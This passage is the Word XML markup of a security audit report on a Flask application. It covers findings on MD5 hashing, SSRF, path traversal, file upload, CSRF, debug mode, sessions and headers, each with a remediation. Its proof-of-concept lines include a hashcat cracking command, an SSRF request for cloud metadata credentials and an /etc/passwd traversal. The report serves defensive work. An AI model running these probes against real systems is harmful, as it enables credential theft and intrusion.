        <w:t xml:space="preserve">Passwords are hashed with unsalted MD5, a fast general-purpose hash never designed for password storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MD5 can be brute-forced or looked up via precomputed rainbow tables at very high speed on commodity GPUs; a stolen user table can be largely cracked within hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m 0 -a 0 stolen_hashes.txt rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use a slow, salted, purpose-built KDF: Werkzeug's generate_password_hash/check_password_hash (PBKDF2 by default), bcrypt, scrypt, or Argon2. Re-hash on next successful login for existing users during migration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F7 — Server-Side Request Forgery (SSRF) in URL fetch feature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8471F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="FBE3D3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-918   ·   app.py — fetch_url()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The server fetches whatever URL is supplied in the url parameter with no restriction on scheme or destination host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker can make the server issue requests to internal-only services or cloud metadata endpoints (e.g. 169.254.169.254) that are not reachable from the public internet, potentially exfiltrating credentials or internal data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Maintain an allowlist of permitted destination hosts/schemes, resolve the hostname and reject private/loopback/link-local IP ranges before connecting, and disable automatic redirect-following (or re-validate the redirect target).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F9 — Path traversal in file download endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8471F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="FBE3D3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-22   ·   app.py — download()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The file query parameter is joined onto the uploads directory and opened with no validation, allowing ../ sequences to escape the intended directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker can read arbitrary files readable by the server process, including application source, configuration, or credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /download?file=../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitize the filename (e.g. werkzeug.utils.secure_filename), resolve the final path with os.path.realpath, and verify it still starts with the intended base directory before opening the file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F10 — Unrestricted file upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B8471F"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="FBE3D3" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIGH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-434   ·   app.py — upload_avatar()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The avatar upload endpoint accepts any file type or size and saves it using the client-supplied filename unmodified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Combined with a predictable/public uploads path, an attacker can upload a script or executable and, depending on server configuration, achieve remote code execution or stored XSS via an uploaded HTML file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /profile/upload with avatar=shell.php (or .html containing a script) saved and later served as-is.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Allowlist file extensions and validate actual content (not just the extension), cap upload size, generate a random server-side filename rather than trusting the client's, and serve uploads from a location that cannot execute server-side code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F11 — Missing CSRF protection on state-changing requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9A6B00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="FBF0CE" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> MEDIUM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-352   ·   app.py — all POST routes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">None of the forms include a CSRF token, and no CSRF middleware is configured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A malicious third-party page can submit a form to any state-changing endpoint (e.g. creating a note, changing preferences) using the victim's authenticated session without their consent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A hidden auto-submitting form on an attacker-controlled page, targeting POST /notes/new while the victim is logged in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add CSRF protection (Flask-WTF's CSRFProtect) and include the token as a hidden field in every form that performs a state change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F12 — Insecure deployment configuration (debug mode, bind address)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9A6B00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="FBF0CE" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> MEDIUM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-489 / CWE-605   ·   app.py — __main__ block</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The app is started with debug=True and host="0.0.0.0", hardcoded rather than environment-driven.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flask's debug mode exposes the interactive Werkzeug debugger, which allows arbitrary code execution to anyone who can trigger an unhandled exception. Binding to 0.0.0.0 exposes the dev server on every network interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger any unhandled exception, then use the in-browser Werkzeug debugger console.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Default debug to False and drive it from an environment variable that is never set to true in production; run behind a production WSGI server (gunicorn/uwsgi), not the Flask dev server; bind only to the interface actually required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F13 — Session management weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9A6B00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="FBF0CE" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> MEDIUM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-384   ·   app.py — login()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The session is not cleared/regenerated on login (fixation risk), and no explicit cookie flags (HttpOnly, Secure, SameSite) or idle timeout are configured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker who can set a victim's session identifier before login (session fixation) may be able to hijack the authenticated session afterward; missing cookie flags increase exposure to XSS-based cookie theft and cross-site leakage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Set a known session cookie on the victim before they authenticate; if the app keeps using the same session id post-login, the attacker's copy becomes valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Call session.clear() (or otherwise issue a new session id) immediately after successful authentication, and set SESSION_COOKIE_HTTPONLY, SESSION_COOKIE_SECURE, SESSION_COOKIE_SAMESITE, and PERMANENT_SESSION_LIFETIME.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">F14 — Missing security response headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A6B35"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="DFF0DA" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> LOW </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE-693   ·   application-wide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, or Strict-Transport-Security headers are set on any response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Absence of these headers widens the practical impact of any XSS found (F2) and leaves the app more exposed to clickjacking and MIME-sniffing based attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:bottom w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:left w:val="single" w:color="CBD2D9" w:sz="2"/>
          <w:right w:val="single" w:color="CBD2D9" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I https://target/dashboard  (headers listed above are absent)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set baseline security headers on every response, either manually in an after_request hook or via a library such as flask-talisman.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. General Secure Coding Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
